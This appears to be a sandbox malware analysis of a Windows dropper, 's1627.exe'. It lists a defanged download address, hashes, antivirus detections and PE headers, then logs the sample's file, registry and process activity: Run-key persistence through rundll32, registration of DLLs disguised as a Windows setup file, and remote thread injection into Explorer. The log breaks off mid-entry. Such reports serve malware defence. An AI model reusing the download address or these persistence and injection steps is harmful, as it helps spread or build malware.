Download Link: hxxp://219.148.34.10/s1627.exe File Name: s1627.exe File size: 468480 bytes MD5: bb6e5ee4b0e429ae734d995026e01c20 SHA1: f0c0dc9f7c282c697b7caff9df70e7d86483c522 PEiD: PECompact 2.xx --> BitSum Technologies packers: PECompact packers: PecBundle, PECompact packers: PE_Patch.PECompact, PecBundle, PECompact Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=71596CDA00D4EA73266607E815CAB5008BA3334F VirusTotal Result: 22/32 (68.75%) AhnLab-V3: Dropper/Agent.468480 AntiVir: TR/Drop.Agent.DGC.5 Authentium: Possibly a new variant of W32/Threat-SysVenFakP-based!Maximus Avast: Win32:Qhost-AYU AVG: Dropper.Generic.SZV CAT-QuickHeal: (Suspicious) - DNAScan DrWeb: Trojan.MulDrop.12121 eSafe: Suspicious File Ewido: Dropper.Agent.dgc F-Prot: W32/Threat-SysVenFakP-based!Maximus F-Secure: Trojan-Dropper.Win32.Agent.dgc Fortinet: W32/Agent.E613!tr.dldr Ikarus: Trojan-Dropper.Win32.Agent.dgc Kaspersky: Trojan-Dropper.Win32.Agent.dgc NOD32v2: Win32/TrojanDropper.Agent.NHD Panda: Adware/BaiduBar Prevx1: Heuristic: Suspicious Self Modifying EXE Rising: Dropper.Win32.Agent.zfw Sophos: Sus/Behav-1021 Symantec: Adware.Rugo VBA32: Trojan.Cinco Webwasher-Gateway: Trojan.Drop.Agent.DGC.5 File Info: PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0002 Time/Date stamp: 4758A69E Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 010F Magic: 010B Linker version (major): 06 Linker version (minor): 00 Size of code: 00008000 Size of initialized data: 00074000 Size of uninitialized data: 00000000 Address of entry point: 00007FF8 Base of code: 00001000 Base of data: 00009000 Image base: 00400000 Section alignment: 00001000 File alignment: 00000200 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 0007F000 Size of headers: 00000400 Checksum: 00077260 Sub system: 0002 - Windows graphical user interface (GUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags .text 0007C000 00001000 00070A00 00000400 E0000060 .rsrc 00002000 0007D000 00001800 00070E00 E0000020 VERSIONINFO: FILEVERSION 5,1,2600,2180 PRODUCTVERSION 5,1,2600,2180 FILEOS 0x4 FILETYPE 0x1 { BLOCK "StringFileInfo" { BLOCK "080404b0" { VALUE "Comments", "" VALUE "CompanyName", "Microsoft Corporation" VALUE "FileDescription", "Windows NT Setup Executable" VALUE "FileVersion", "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" VALUE "InternalName", "setup" VALUE "LegalCopyright", "Copyright Microsoft Corporation(C) 2006" VALUE "LegalTrademarks", "" VALUE "OriginalFilename", "setup.exe" VALUE "PrivateBuild", "" VALUE "ProductName", "Microsoft Windows Operating System" VALUE "ProductVersion", "5.1.2600.2180" VALUE "SpecialBuild", "" } } BLOCK "VarFileInfo" { VALUE "Translation", 0x0804 0x04B0 } } When the executable runs, it drops an executable 86a01.exe in the %System% folder and starts it as a process. File Name: 86a01.exe File size: 118784 bytes MD5: e3a84c700311f8ae35453a9f21c49720 SHA1: 08a131466229fa79f958fff6a55b498e67aa593a PEiD: Armadillo v1.71 Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=e3a84c700311f8ae35453a9f21c49720 Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=AD05669A00C7F640D06901B739EA8E0063DC4FBB PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0004 Time/Date stamp: 47589EB7 Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 010F Magic: 010B Linker version (major): 06 Linker version (minor): 00 Size of code: 00014000 Size of initialized data: 0000A000 Size of uninitialized data: 00000000 Address of entry point: 0000BECE Base of code: 00001000 Base of data: 00015000 Image base: 00400000 Section alignment: 00001000 File alignment: 00001000 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 0001F000 Size of headers: 00001000 Checksum: 00000000 Sub system: 0003 - Windows character-mode user interface (CUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags .text 00013C45 00001000 00014000 00001000 60000020 .rdata 00002596 00015000 00003000 00015000 40000040 .data 00005F68 00018000 00004000 00018000 C0000040 .rsrc 000003A8 0001E000 00001000 0001C000 40000040 Import table (libraries: 4) ------------------------------------ KERNEL32.dll (imports: 66) ReadFile CreateFileA DeviceIoControl GetModuleHandleA GetEnvironmentVariableA MultiByteToWideChar WideCharToMultiByte LocalFree SetEndOfFile SetStdHandle IsBadCodePtr Sleep GetLastError GetModuleFileNameA CreateDirectoryA GetFileAttributesA DeleteFileA CreateProcessA WaitForSingleObject CloseHandle SetFileAttributesA CopyFileA CreateFileMappingA LoadLibraryA GetProcAddress FreeLibrary GetVersionExA GetWindowsDirectoryA lstrlenA IsBadReadPtr GetStringTypeW GetStringTypeA FlushFileBuffers SetFilePointer IsBadWritePtr VirtualAlloc WriteFile RtlUnwind RaiseException GetCommandLineA GetVersion ExitProcess HeapFree HeapAlloc HeapReAlloc TerminateProcess GetCurrentProcess LCMapStringA LCMapStringW GetCPInfo HeapSize GetACP GetOEMCP SetUnhandledExceptionFilter UnhandledExceptionFilter FreeEnvironmentStringsA FreeEnvironmentStringsW GetEnvironmentStrings GetEnvironmentStringsW SetHandleCount GetStdHandle GetFileType GetStartupInfoA HeapDestroy HeapCreate VirtualFree ADVAPI32.dll (imports: 18) RegisterServiceCtrlHandlerA SetServiceStatus StartServiceCtrlDispatcherA ControlService DeleteService StartServiceA QueryServiceStatus CreateServiceA ChangeServiceConfig2A RegCreateKeyA RegSetValueExA OpenSCManagerA OpenServiceA CloseServiceHandle DeregisterEventSource RegEnumValueA RegOpenKeyExA RegCloseKey ole32.dll (imports: 4) CoUninitialize CoGetClassObject StringFromCLSID CoInitialize OLEAUT32.dll (imports: 1) #9 VirusTotal Result: 20/32 (62.5%) AntiVir: TR/BHO.acv Avast: Win32:Qhost-AYU AVG: Generic9.ADCD CAT-QuickHeal: Trojan.BHO.acv ClamAV: Trojan.BHO-1289 Ewido: Trojan.BHO.acv F-Prot: W32/Trojan2.VDH F-Secure: Trojan.Win32.BHO.acv FileAdvisor: High threat detected Fortinet: Adware/Rugo Ikarus: Virus.Win32.Qhost.AYU Kaspersky: Trojan.Win32.BHO.acv NOD32v2: a variant of Win32/BHO.NCY Prevx1: TROJAN.AGENT.GEN Rising: AdWare.Win32.Agent.zpo Sophos: Mal/Generic-A Sunbelt: Trojan.BHO.acv Symantec: Infostealer.Gampass TheHacker: Trojan/BHO.acv Webwasher-Gateway: Trojan.BHO.acv File Info for s1627.exe: File System Activity: Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ Flags: (SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\_uninstall Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\_uninstall Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0 Flags: (SECURITY_ANONYMOUS) Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll (OPEN_EXISTING) Set File Time: Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Set File Attributes: adsfe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: dc Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: %$ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: ~~ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: dcd Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Open File: \\.\PhysicalDrive0 (OPEN_EXISTING) Open File: \\.\PhysicalDrive1 (OPEN_EXISTING) Open File: \\.\PhysicalDrive2 (OPEN_EXISTING) Open File: \\.\PhysicalDrive3 (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\311.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\1831.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\86a01.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\3d311.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\851.bmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\5b21.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\b2c11.txt Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\2c1ee1.rm Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\WINDOWS\system32\86a01.exe Move File: C:\WINDOWS\system32\86a01.exe to Open File: \SystemRoot\AppPatch\sysmain.sdb (OPEN_EXISTING) Open File: \SystemRoot\AppPatch\systest.sdb (OPEN_EXISTING) Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING) Open File: C:\WINDOWS\system32\regsvr32.exe () Find File: regsvr32.exe Delete File: C:\WINDOWS\system32\1831.dll Move File: C:\WINDOWS\system32\1831.dll to Set File Attributes: C:\WINDOWS\system32\1831.dlltmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\WINDOWS\system32\1831.dlltmp Move File: C:\WINDOWS\system32\1831.dll to C:\WINDOWS\system32\1831.dlltmp Delete File: C:\WINDOWS\system32\311.dll Move File: C:\WINDOWS\system32\311.dll to Delete File: C:\WINDOWS\system32\3d311.dll Move File: C:\WINDOWS\system32\3d311.dll to Delete File: C:\WINDOWS\851.bmp Delete File: C:\WINDOWS\5b21.exe Delete File: C:\WINDOWS\b2c11.txt Delete File: C:\WINDOWS\2c1ee1.rm Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe () Find File: miniup.exe Get File Attributes: C:\WINDOWS\system32\311.dll Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll to C:\WINDOWS\system32\311.dll Open File: C:\WINDOWS\system32\311.dll (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\311.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll to C:\WINDOWS\851.bmp Open File: C:\WINDOWS\851.bmp (OPEN_EXISTING) Get File Attributes: C:\WINDOWS\system32\1831.dll Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll to C:\WINDOWS\system32\1831.dll Open File: C:\WINDOWS\system32\1831.dll (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\1831.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll to C:\WINDOWS\5b21.exe Open File: C:\WINDOWS\5b21.exe (OPEN_EXISTING) Get File Attributes: C:\WINDOWS\system32\86a01.exe Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe to C:\WINDOWS\system32\86a01.exe Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe to C:\WINDOWS\b2c11.txt Open File: C:\WINDOWS\b2c11.txt (OPEN_EXISTING) Open File: C:\WINDOWS\system32\86a01.exe () Find File: 86a01.exe Opens Mutex: 1951942714 Registry Reads: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed" Process Management: Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -e) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -u) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\regsvr32.exe /u /s "C:\WINDOWS\system32\1831.dll") As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\regsvr32.exe /s "C:\WINDOWS\system32\1831.dll") As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -i) As User: () Creation Flags: () System Info: Get System Directory Get System Time Process Started: Filename: C:\WINDOWS\system32\regsvr32.exe /u /s C:\WINDOWS\system32\1831.dll Filesize: 11776 bytes MD5: 9709ead856a690333138ac40804f914e Start Reason: CreateProcess function call Registry Reads: HKEY_CLASSES_ROOT\.dll "" Kill Process - Filename (s1627.exe) Process Started: Filename: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Filesize: 66560 bytes MD5: aecc5710067a0b9f3d670c27be3c3587 Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\ Flags: (SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o Flags: (SECURITY_ANONYMOUS) Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll (OPEN_EXISTING) Set File Time: Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll to C:\WINDOWS\Downlo~1\d6wqe4ci.dll Open File: C:\WINDOWS\602384a2 (OPEN_EXISTING) Set File Attributes: cdd Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\WINDOWS\602384a2 Open File: \SystemRoot\AppPatch\sysmain.sdb (OPEN_EXISTING) Open File: \SystemRoot\AppPatch\systest.sdb (OPEN_EXISTING) Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING) Open File: C:\WINDOWS\system32\rundll32.exe () Find File: rundll32.exe Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\minidll.dll Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\minidll.dll to C:\WINDOWS\Downlo~1\bn6wuj.dll Open File: C:\WINDOWS\9635-124-94 (OPEN_EXISTING) Create File: C:\WINDOWS\9635-124-94 Find File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\*.* Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Flags: (SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Registry Changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run "d6wqe4ci" = rundll32 "C:\WINDOWS\Downlo~1\d6wqe4ci.dll",start HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run "bn6wuj" = rundll32 "C:\WINDOWS\Downlo~1\bn6wuj.dll",Run Registry Reads: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed" Process Management: Creates Process - Filename () CommandLine: (rundll32 "C:\WINDOWS\Downlo~1\d6wqe4ci.dll",start) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (rundll32 "C:\WINDOWS\Downlo~1\bn6wuj.dll",Run) As User: () Creation Flags: () Kill Process - Filename () CommandLine: () Target PID: (1012) As User: () Creation Flags: () System Info Get System Directory Get Windows Directory Process Stsrted: Filename: rundll32 C:\WINDOWS\Downlo~1\d6wqe4ci.dll,start Filesize: 33280 bytes MD5: da285490bbd8a1d0ce6623577d5ba1ff Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll.manifest Flags: (SECURITY_ANONYMOUS) Process Activity: Kill Process - Filename () CommandLine: () Target PID: (1128) As User: () Creation Flags: () Enum Processes Enum Modules - Target PID: (1128) Open Process - Filename (C:\WINDOWS\Explorer.EXE) Target PID: (1508) System Info: Get System Directory Threads: Create Remote Thread - Target PID (1508) Thread ID (1388) Thread ID ($7C80ACD3) Parameter Address ($00EA0000) Creation Flags (CREATE_SUSPENDED) Process Stsrted: Filename: rundll32 C:\WINDOWS\Downlo~1\bn6wuj.dll,Run Filesize: 33280 bytes MD5: da285490bbd8a1d0ce6623577d5ba1ff Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll.manifest Flags: (SECURITY_ANONYMOUS) Process Activity: Kill Process - Filename () CommandLine: () Target PID: (1256) As User: () Creation Flags: () Enum Processes: Enum Modules - 